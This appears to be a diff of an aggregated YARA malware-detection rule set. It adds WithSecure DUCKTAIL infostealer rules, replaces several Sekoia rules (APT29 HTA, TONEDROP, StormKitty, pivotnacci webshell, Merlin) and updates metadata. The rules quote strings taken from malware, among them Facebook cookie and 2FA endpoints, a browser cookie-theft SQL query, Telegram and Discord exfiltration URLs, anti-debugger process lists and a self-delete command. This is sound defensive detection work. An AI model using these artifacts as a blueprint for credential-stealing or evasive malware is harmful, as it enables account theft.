+rule WITHSECURELABS_Ducktail_Artifacts : FILE
+{
+	meta:
+		description = "Detects artifacts found in files associated to DUCKTAIL malware"
+		author = "WithSecure"
+		id = "937c9688-b74f-5e02-838f-ab6757a8d2a1"
+		date = "2022-07-18"
+		modified = "2022-07-26"
+		reference = "https://labs.withsecure.com/publications/ducktail"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_artifacts.yar#L1-L20"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
+		logic_hash = "1daa5e654058c802826b6a306b5bfc9d0c05c4ee54607e94e618a8d409ce74d9"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "3dbd9e1c3d0fd6358d4adcba04fdfc0b6e8acc49"
+		hash2 = "9370243589327b458486e3f7637779c2a96b4250"
+		hash3 = "b98170b18b906aee771dbd4dbd31e5963a90a50e"
+
+	strings:
+		$pdb_path_1 = /[a-z]\:\\projects\\(viruttest|virot)\\/i nocase ascii
+		$pdb_path_2 = /[a-z]\:\\users\\ductai\\/i nocase ascii
+		$pdb_path_3 = "\\dataextractor.pdb" nocase ascii
+		$email = "ductai2308@gmail.com" wide ascii
+
+	condition:
+		uint16( 0 ) == 0x5A4D and any of them
+}
+rule WITHSECURELABS_Ducktail_Dotnet_Core_Infostealer : FILE
+{
+	meta:
+		description = "Detects DUCKTAIL malware written in .NET Core"
+		author = "WithSecure"
+		id = "22eef7ce-9e11-55ec-9f0b-00a6776f8eee"
+		date = "2022-07-18"
+		modified = "2022-07-25"
+		reference = "https://labs.withsecure.com/publications/ducktail"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_dotnet_core_infostealer.yar#L1-L103"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
+		logic_hash = "81b4da5860894397e9cd416e451c3098f8560407cd79f070f8edd5a3ba91512a"
+		score = 75
+		quality = 50
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "b260f3857990e11fa267d3f1cad4c9bed59a9d4b"
+		hash2 = "db74863c01817bf4eba39cd8a0ebbce9bda85a37"
+		hash3 = "3a4b395301f61b7e6afc0ab27dc02331455181d0"
+
+	strings:
+		$dotnet_core_bundle_signature = { 8B 12 02 B9 6A 61 20 38 72 7B 93 02 14 D7 A0 32 13 F5 B9 E6 EF AE 33 18 EE 3B 2D CE 24 B3 6A AE }
+		$fb_str_1 = "c_user" wide ascii
+		$fb_str_2 = "https://business.facebook.com/security/twofactor/reauth/enter" wide ascii
+		$fb_str_3 = "https://business.facebook.com/security/twofactor/reauth" wide ascii
+		$fb_str_4 = "mbasic.facebook.com" wide ascii
+		$fb_str_5 = "DTSGInitData\",[],{\"token\":\"" wide ascii
+		$fb_str_6 = "www.facebook.com" wide ascii
+		$fb_str_7 = "m.facebook.com" wide ascii
+		$fb_str_8 = "business.facebook.com" wide ascii
+		$fb_str_9 = "approvals_code=" wide ascii
+		$fb_str_10 = "c_user=" wide ascii
+		$fb_str_11 = "&__a=1&__comet_req=0&fb_dtsg=" wide ascii
+		$fb_str_12 = "&__jssesw=1" wide ascii
+		$fb_str_13 = "approvals_code=" wide ascii
+		$fb_str_14 = "<BmLinks>k__BackingField" wide ascii
+		$fb_str_15 = "set_FbCookies" wide ascii
+		$fb_str_16 = "<AdsAccount>k__BackingField" wide ascii
+		$fb_str_17 = "GetAllFbData" wide ascii
+		$fb_str_18 = "get_account_id" wide ascii
+		$fb_str_19 = "set_BmLinks" wide ascii
+		$fb_str_20 = "GetBmLink" wide ascii
+		$fb_str_21 = "GetBm" wide ascii
+		$fb_str_22 = "ExtractUserId" wide ascii
+		$fb_str_23 = "set_Bussinesses" wide ascii
+		$fb_str_24 = "set_FbData" wide ascii
+		$fb_str_25 = "get_Nguong" wide ascii
+		$fb_str_26 = "ResetCookie" wide ascii
+		$fb_str_27 = "set_UserId" wide ascii
+		$fb_str_28 = "<Nguong>k__BackingField" wide ascii
+		$fb_str_29 = "get_UserId" wide ascii
+		$fb_str_30 = "set_Nguong" wide ascii
+		$fb_str_31 = "AdsBusiness" wide ascii
+		$fb_str_32 = "<FbData>k__BackingField" wide ascii
+		$fb_str_33 = "<FbCookies>k__BackingField" wide ascii
+		$fb_str_34 = "<invite_link>k__BackingField" wide ascii
+		$fb_str_35 = "get_FbData" wide ascii
+		$fb_str_36 = "get_invite_link" wide ascii
+		$fb_str_37 = "get_Bussinesses" wide ascii
+		$fb_str_38 = "GetNguong" wide ascii
+		$fb_str_39 = "set_AdsAccount" wide ascii
+		$fb_str_40 = "set_invite_link" wide ascii
+		$fb_str_41 = "set_AllCookies" wide ascii
+		$fb_str_42 = "get_business" wide ascii
+		$fb_str_43 = "set_business" wide ascii
+		$fb_str_44 = "<Bussinesses>k__BackingField" wide ascii
+		$fb_str_45 = "GetAdsFromToken" wide ascii
+		$fb_str_46 = "get_AdsAccount" wide ascii
+		$fb_str_47 = "get_BmLinks" wide ascii
+		$fb_str_48 = "FbDataScanner" wide ascii
+		$exfil_str_1 = "telegramBotClient_OnUpdate" wide ascii
+		$exfil_str_2 = "telegramHandler" wide ascii
+		$exfil_str_3 = "ZipArchive" wide ascii
+		$exfil_str_4 = "KillItSame" wide ascii
+		$exfil_str_5 = "1.txt" wide ascii
+		$exfil_str_6 = ".zip" wide ascii
+		$exfil_str_7 = "2.txt" wide ascii
+		$browser_str_1 = "GetCookies" wide ascii
+		$browser_str_2 = "get_AllCookies" wide ascii
+		$browser_str_3 = "ChromiumBrowser" wide ascii
+		$browser_str_4 = "myBrowsers" wide ascii
+		$browser_str_5 = "get_CookiePath" wide ascii
+		$browser_str_6 = "ScanFirefox" wide ascii
+		$browser_str_7 = "get_FbCookies" wide ascii
+		$browser_str_8 = "ScanChomium" wide ascii
+		$browser_str_9 = "BrowserScanner" wide ascii
+		$browser_str_10 = "ScanChronium" wide ascii
+		$browser_str_11 = "CookieData" wide ascii
+		$browser_str_12 = "listBrowser" wide ascii
+		$browser_str_13 = "BrowserCookie" wide ascii
+		$browser_str_14 = "<Cookies>k__BackingField" wide ascii
+		$browser_str_15 = "AddCookie" wide ascii
+		$browser_str_16 = "set_CookiePath" wide ascii
+		$browser_str_17 = "Local State" wide ascii
+		$browser_str_18 = "select name, path, expires_utc, is_secure, is_httponly, host_key, encrypted_value  from cookies" wide ascii
+		$browser_str_19 = "Google\\Chrome\\User Data" wide ascii
+		$browser_str_20 = "Microsoft\\Edge\\User Data" wide ascii
+		$browser_str_21 = "Cookies" wide ascii
+		$browser_str_22 = "encrypted_key\":\"" wide ascii
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $dotnet_core_bundle_signature and ( ( 7 of ( $fb_str_* ) and ( 7 of ( $browser_str_* ) or 3 of ( $exfil_str_* ) ) ) or ( 7 of ( $browser_str_* ) and 3 of ( $exfil_str_* ) ) )
+}
+
+rule WITHSECURELABS_Ducktail_Nativeaot : FILE
+{
+	meta:
+		description = "Detects NativeAOT variants of DUCKTAIL malware"
+		author = "WithSecure"
+		id = "1961d3e1-987b-588b-bfc2-8239797cd049"
+		date = "2022-11-17"
+		modified = "2022-11-22"
+		reference = "https://labs.withsecure.com/publications/ducktail_returns"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_nativeaot.yara#L2-L22"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
+		logic_hash = "976b28ac45e5a13d4ce900b857e6bd3afc82b65b0235791fd698b762287cd60e"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "b043e4639f89459cae85161e6fbf73b22470979e"
+		hash2 = "073b092bf949c31628ee20f7458067bbb05fda3a"
+		hash3 = "d1f6b5f9718a2fe9eaac0c1a627228d3f3b86f87"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize > 15MB and ( pe.section_index ( ".managed" ) >= 0 or pe.exports ( "DotNetRuntimeDebugHeader" ) ) and pe.exports ( "SendFile" ) and pe.exports ( "Start" ) and pe.exports ( "Open" )
+}
+
 rule WITHSECURELABS_SILKLOADER
 {
 	meta:
@@ -218063,7 +218186,7 @@ rule WITHSECURELABS_SILKLOADER
  * YARA Rule Set
  * Repository Name: HarfangLab
  * Repository: https://github.com/HarfangLab/iocs
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 278c38e11e99d35af836cb9140e0857fd9226574
  * Number of Rules: 36
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -219106,7 +219229,7 @@ rule HARFANGLAB_Apt31_Rawdoor_Payload : FILE
 		hash = "fade96ec359474962f2167744ca8c55ab4e6d0700faa142b3d95ec3f4765023b"
 		logic_hash = "51bd04603419d5bc77f12618df986f6b31ea8ddea553c6bc7580698fa236b3ed"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		context = "file"
 
@@ -219140,7 +219263,7 @@ rule HARFANGLAB_Iis_Module_Hijackserver_Native : FILE
 		hash = "c1ca053e3c346513bac332b5740848ed9c496895201abc734f2de131ec1b9fb2"
 		logic_hash = "f0539a40958b34bb8372f8a8a6ca22617626fc7806556d6353175aa5f2ec0aea"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		context = "file"
 
@@ -219220,7 +219343,7 @@ rule HARFANGLAB_Apache_Module_Hijackserver_Php_Decoded : FILE
 		hash = "e107bf25abc1cff515b816a5d75530ed4d351fa889078e547d7381b475fe2850"
 		logic_hash = "bf40ee8ae3a491c311d5221cb96adef6bd55153d602f1d534f2cb42a12aa68ec"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		context = "file"
 
@@ -219257,7 +219380,7 @@ rule HARFANGLAB_Apache_Module_Hijackserver_Php : FILE
 		hash = "e107bf25abc1cff515b816a5d75530ed4d351fa889078e547d7381b475fe2850"
 		logic_hash = "fe503e8d30a354927c1d4e1cffa18411b4c3ac5058cd3aef8df0e7d87624fe43"
 		score = 75
-		quality = 53
+		quality = 78
 		tags = "FILE"
 		context = "file"
 
@@ -219376,7 +219499,7 @@ rule HARFANGLAB_Custom_Ateraagent_Operator : FILE
  * YARA Rule Set
  * Repository Name: LOLDrivers
  * Repository: https://github.com/magicsword-io/LOLDrivers/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: c577948efd5f91ffa685a7fff3827f308a9c20f5
  * Number of Rules: 569
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -237131,7 +237254,7 @@ rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_4DA0 :
  * YARA Rule Set
  * Repository Name: SEKOIA
  * Repository: https://github.com/SEKOIA-IO/Community
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: eb4a01ac59073178c241b45b6def27c8873569e3
  * Number of Rules: 746
  * Skipped: 0 (age), 3 (quality), 0 (score), 0 (importance)
@@ -237158,119 +237281,45 @@ If you use the Rules (including in modified form) on data, messages based on mat
 THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES.
 
  */
-rule SEKOIA_Apt_Kimsuky_Fpspy : FILE
+rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Hta
 {
 	meta:
-		description = "Detects FPSpy, a backdoor used by Kimsuky"
+		description = "Detects malicious HTA used by APT29 to drop Wineloader"
 		author = "Sekoia.io"
-		id = "75d41851-a7a6-4068-8ea5-6a3e6e62a965"
-		date = "2024-09-27"
+		id = "5a17d854-0564-4830-a0e5-7867b99716c2"
+		date = "2024-03-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_fpspy.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "6d6c1b175e435f5564341cc1f2c33ddf"
-		hash = "54c58b72f98cb63c44e7694add551e9d"
-		logic_hash = "65904b77a30b2e2a25f8d80ab32742f0ad931f07c034ae576a4fbde7e1fd999c"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "Chrome/31.0." wide
-		$ = "%srundll32.exe %s, %s %%1" wide
-		$ = "MazeFunc" wide
-		$ = "sys.dll" wide
-		$ = "KLog" wide
-
-	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
-}
-rule SEKOIA_Implant_Lin_Geacon : FILE
-{
-	meta:
-		description = "Finds Geacon samples based on specific strings"
-		author = "Sekoia.io"
-		id = "ad71522e-270b-47d0-9c01-081f05a2b72a"
-		date = "2024-01-11"
-		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_lin_geacon.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_wineloader_malicious_hta.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c6fa5815bf618eb588d511f18231042944dee20c1b13096c44910d43ca552bfa"
+		hash = "efafcd00b9157b4146506bd381326f39"
+		logic_hash = "0cc4692e5ff3f258c287f28030147f725d6a534c4f2f7a2a4ff49a305b7fd13d"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$ = "<HTA:APPLICATION ID="
+		$ = "var _0x"
+		$ = "Date['\\x6e\\x6f\\x77']"
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		all of them
 }
-rule SEKOIA_Tool_Win_Forkplayground : FILE
+rule SEKOIA_Apt_Mustangpanda_Tonedrop : FILE
 {
 	meta:
-		description = "Detect the ForkPlayground malware"
+		description = "TONEDROP strings"
 		author = "Sekoia.io"
-		id = "ec9af403-7647-447d-af17-c6931363a166"
-		date = "2023-02-28"
+		id = "39df631c-5766-4804-838f-6c9b800c0cc9"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_forkplayground.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "23d93b7eef978f76c9aa6c0bc28a661d160b0a871fd320442b6c27bc92bc279e"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "Failed to open dump file %s with the last error %i."
-		$ = "Successfully dumped process %i to %s"
-		$ = "ForkPlayground"
-		$ = "Second attempt at taking a snapshot of the target failed. It is likely that there is a difference in process privilege or the handle was stripped."
-		$ = "Failed to take a snapshot of the target process. Attempting to escalate debug privilege..."
-		$ = "Failed to escalate debug privileges, are you running ForkDump as Administrator"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
-}
-rule SEKOIA_Trojan_Win_Bbtok_Iso_Sep23 : FILE
-{
-	meta:
-		description = "Finds BBTok installation ISO file"
-		author = "Sekoia.io"
-		id = "6032853d-b872-4b2e-913d-366e7f3d0f32"
-		date = "2023-09-26"
-		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_iso_sep23.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_tonedrop.yar#L1-L43"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "140e83d2e0d012cdd5625ea89c3b3af05a80877cfc8215bbe20823e7e88c80b1"
-		logic_hash = "efef1e4e50d84cd30c025c86beb751c73a996cca896f90729571f48259ffc110"
+		logic_hash = "97f9138810fbc56fa1cab671865b3234f63fcd0f9a15ba012dfe76e86c6dbd48"
 		score = 75
 		quality = 78
 		tags = "FILE"
@@ -237278,53 +237327,47 @@ rule SEKOIA_Trojan_Win_Bbtok_Iso_Sep23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$iso = {43 44 30 30 31}
-		$str01 = "POWERISO" ascii
-		$str02 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
-		$str03 = ".pdf /Y & start" wide
-		$str04 = "\\MSBuild.exe -nologo \\\\" ascii wide
+		$window1 = "PROCMON_WINDOW_CLASS" ascii wide
+		$window2 = "OLLYDBG" ascii wide
+		$window3 = "WinDbgFrameClass" ascii wide
+		$window4 = "OllyDbg - [CPU]" ascii wide
+		$window5 = "Immunity Debugger - [CPU]" ascii wide
+		$errormsg1 = "Unable to open file %s for writing" ascii wide
+		$proc_01 = "cheatengine-x86_64.exe" ascii wide
+		$proc_02 = "ollydbg.exe" ascii wide
+		$proc_03 = "ida.exe" ascii wide
+		$proc_04 = "ida64.exe" ascii wide
+		$proc_05 = "radare2.exe" ascii wide
+		$proc_06 = "x64dbg.exe" ascii wide
+		$proc_07 = "procmon.exe" ascii wide
+		$proc_08 = "procmon64.exe" ascii wide
+		$proc_09 = "procexp.exe" ascii wide
+		$proc_10 = "processhacker.exe" ascii wide
+		$proc_11 = "pestudio.exe" ascii wide
+		$proc_12 = "systracerx32.exe" ascii wide
+		$proc_13 = "fiddler.exe" ascii wide
+		$proc_14 = "tcpview.exe" ascii wide
+		$opcodes_check_PEsize = {C7 85 94 FD FF FF 2C 02}
+		$opcodes_ShellExecute_1 = {C7 45 BC 53 68 65 6C}
+		$opcodes_ShellExecute_2 = {C7 45 C0 6C 45 78 65}
+		$opcodes_ShellExecute_3 = {C7 45 C4 63 75 74 65}
+		$opcodes_ShellExecute_4 = {66 C7 45 C8 41 00}
 
 	condition:
-		all of them and filesize < 500KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and 3 of ( $window* ) and $errormsg1 and 10 of ( $proc_* ) and 3 of ( $opcodes* )
 }
-rule SEKOIA_Tool_Powershell_Unicorn : FILE
+rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
 {
 	meta:
-		description = "Detects Unicorn Powershell"
+		description = "Detect the open-source StormKitty spyware by looking for the github path"
 		author = "Sekoia.io"
-		id = "287c1669-2ee1-488e-bf66-a99bfe309c90"
-		date = "2022-08-23"
+		id = "d3b6e778-85da-4ab6-bc98-921897677485"
+		date = "2022-04-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_powershell_unicorn.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8be79789cf77d4f304d9fef4ad6a2d2ac7686b015fff3301fb3e369f2f06230a"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = ").value.toString() ('JAB" ascii wide
-		$ = ").value.toString());powershell (" ascii wide
-		$ = "powershell /w 1 " ascii wide
-
-	condition:
-		all of them and filesize < 100KB
-}
-rule SEKOIA_Rat_Win_Asbit : FILE
-{
-	meta:
-		description = "Finds Asbit samples based on characteristic strings"
-		author = "Sekoia.io"
-		id = "b2d60eff-3dc8-4857-a0ea-d4fcd34c40bc"
-		date = "2022-09-19"
-		modified = "2024-12-19"
-		reference = "https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_asbit.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stormkitty_exfil_urls.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1362ebe89a4d2645eb687d92510daa355a16f05da7f5513817f8439f29722827"
+		logic_hash = "ccf0efe9ccba8e37bc19fa241e2d7698b1a798a3e8026b1b6930452b8a8ba9b4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237332,45 +237375,25 @@ rule SEKOIA_Rat_Win_Asbit : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "/build?project=libexpat&_={0}" wide
-		$str02 = "/resolve?name={0}&short=true&_={1}" wide
-		$str03 = "/c ping 127.0.0.1 & del {0} /q & del /a:H {0} /q" wide
+		$s1 = "https://github.com/LimerBoy/StormKitty" ascii
+		$telegram = "https://api.telegram.org" wide
+		$discord = "https://cdn.discordapp.com" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
+		uint16( 0 ) == 0x5A4D and all of them and ( #telegram > 3 or #discord > 3 )
 }
-rule SEKOIA_Apt_Toneshell_Loader : FILE
+rule SEKOIA_Tool_Pivotnacci_Webshell : FILE
 {
 	meta:
-		description = "Detects loader of ToneShell (exception based)"
+		description = "Detects pivotnacci webshell"
 		author = "Sekoia.io"
-		id = "b4bf284b-cab6-455e-a1c1-ad341d43bfdd"
-		date = "2024-10-02"
+		id = "729b6381-b59d-46fe-9ad4-b8b68fb0ceea"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toneshell_loader.yar#L1-L40"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pivotnacci_webshell.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "41e0d172d900344a3692b88fff7527d9"
-		hash = "782cf7183735935f3f7aad041cec3184"
-		hash = "97c1f436028c58b51d4c92ee9c9ce424"
-		hash = "d6c771f2afd8ce35e8727f95f3a3c6c4"
-		hash = "b8520c5bad88ade394086cb7b1b7b631"
-		hash = "0b3e8571e70a32490da19f6b3283151c"
-		hash = "f6784c65ee115a9ae4c0fb03e0045285"
-		hash = "38888696e5223c77f5f8680922396123"
-		hash = "b52d0707e4e5d5c0d5fd5f5a177ba712"
-		hash = "fd54c6d17ff91640b377ff41353efdaa"
-		hash = "a6efe263acc794a212647a96e52ddf1f"
-		hash = "6e8c80c5f2f9a1da504618e984d2a56c"
-		hash = "0839666697ccc562a9c1fe77d6755931"
-		hash = "f367f2fe580e556176b60da202c742a5"
-		hash = "e8b2fcc14494ada2f28d1f6ecd2521a2"
-		hash = "c08589e10812cc7d636dcbe2a36d43b4"
-		hash = "fa848a05cfecc0c25cd21364c9516584"
-		hash = "be231f7879d8d2159b67b7f277527268"
-		hash = "2acd8b48202dcc30d88a871370c4f37a"
-		hash = "72963bfc2837695f038680471d4f061c"
-		logic_hash = "40e1b918a4d83a4918260d8b1cc56e5097665a366f94bd5068e4ae519e3a681b"
+		logic_hash = "a57792915b4c888547ebe0b08b928e4bc32b3526c98a3ccc9fca0193cedee20a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237378,54 +237401,32 @@ rule SEKOIA_Apt_Toneshell_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$exception = {00 00 00 00 2e 44 00 00}
-		$code = {02 00 00 00 66 89 96}
-		$kernel32 = "Kernel32.dll" wide
-		$outputdbgstr = "OutputDebugStringA"
-		$content = "ResetEvent"
+		$ = "if (cmd == SEND_OPERATION) {"
+		$ = "Response.BinaryWrite(newBuff)"
+		$ = "Request.Headers.Get(ID_HEADER)"
+		$ = "[$READ_BUFFER_SESSION_KEY . $connection_id]"
+		$ = "extract_session_readbuf($conn_id"
+		$ = "Failed connecting to target $addr:$port : $errstr"
+		$ = "void handle_post(String cmd)"
+		$ = "SocketChannel socketChannel = this.get_socket(socket_id"
+		$ = "this.get_svc().compareTo(this.get_hostname())"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 2MB
+		3 of them and filesize < 10KB
 }
-rule SEKOIA_Tool_Sharpsecdump : FILE
-{
-	meta:
-		description = "No description has been set in the source file - SEKOIA"
-		author = "Sekoia.io"
-		id = "359bf48b-81c8-4d12-ac02-777d4865411a"
-		date = "2023-06-23"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpsecdump.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f183069d843767daa97bc81385e5e1b3a19c556f8171f28f8806aebe7a226176"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = "SharpSecDump"
-		$s2 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7"
-		$s3 = "Md4Hash2"
-		$s4 = "RidToKey"
-
-	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
-}
-rule SEKOIA_Tool_Edrsandblast_Strings : FILE
+rule SEKOIA_Merlin_Win_Exe : FILE
 {
 	meta:
-		description = "Detects EDRSandblast strings"
+		description = "Detects Merling agent (PE)"
 		author = "Sekoia.io"
-		id = "7059b89c-80b5-4768-b3eb-02f173f628b0"
-		date = "2024-01-08"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be4"
+		date = "2022-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_strings.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_win_exe.yar#L4-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8528c4c440734ba97b98b6e0857d95f38a91eaf9120ba2eacff292c864fb86a5"
+		logic_hash = "6a42e9ea9749dc894788d80cd4395da026ef3c49eab1de6802e09f8b1751f5bd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237433,67 +237434,54 @@ rule SEKOIA_Tool_Edrsandblast_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] Cred Guard bypass failed: obtained invalid" wide
-		$ = "[!] Cred Guard bypass non fatal error:" wide
-		$ = "[+] Successfully overwrote wdigest's g_fParameter_UseLogonCredential" wide
-		$ = "[!] ERROR: could not allocate memory for the handl" wide
-		$ = "[+] [ProcessProtection] Found the handle of the current" wide
-		$ = "[+] [ProcessProtection] Found self process EPROCCES struct at" wide
-		$ = "ETW Threat Intel ProviderEnableInfo address could not be found." wide
-		$ = "The ETW Threat Intel provider was successfully" wide
